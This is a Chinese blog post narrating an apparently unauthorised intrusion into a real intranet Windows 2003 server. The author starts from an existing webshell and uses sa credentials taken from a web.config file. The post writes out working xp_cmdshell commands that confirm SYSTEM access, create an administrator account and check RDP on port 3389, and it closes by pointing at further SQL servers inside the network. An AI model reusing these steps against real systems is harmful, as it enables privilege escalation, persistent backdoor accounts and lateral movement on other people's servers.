描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术!本文敏感信息以屏蔽!密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行,再通过自己的灵活思维运用。
环境:2003 SERVER
IIS :6.0 支持php
数据库:MSSQL和MYSQL
网站类型:ASPX
本 文重点讲述内网渗透提权部分,对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道,拿到webshell后服务器能否提权就要先找提权的漏洞所 在。从本站的角度来看,存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录,很平常么。 没现有SU和MYSQL之类的信息。
E:盘可以浏览
F:盘可以浏览
本站ASPX 类型网站,使用的是MSSQL数据库。显示密码不是最高权限的用户,就是是个DB用户提权也不能马上到手。
再翻翻别的站点,目录可以浏览一个个找吧。发现一个目录web.config有SA用户
连接数据库信息:
Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****” 打开aspxspy,使用database连接功能。
登录成功,显示SA看来应该没有降权。
连接状态是MSSQL 2005,要先启xp_cmdshell.
接着执行下命令”whoami”
good,system 权限,下面就是添加一个账号了。。
Exec master.dbo.xp_cmdshell ‘net user admin **** /add’
Exec master.dbo.xp_cmdshell ‘net localgroup administrators admin /add’
再看下3389端口是否开启
Exec master.dbo.xp_cmdshell ‘netstat -ano’
OK,状态正常。
Exec master.dbo.xp_cmdshell ‘ipconfig /all’显示配置是内网IP
通过域名解析到的IP连接3389,可以连接。
说明管理做了端口映射,这就不要转发端口了。省了很多功夫!
这才拿到了一台服务器的权限,从网站的SQL连接上不难发现内网还有SQL服务器。
转载请注明:jinglingshu的博客 » MSSQL 入侵提权之内网渗透案例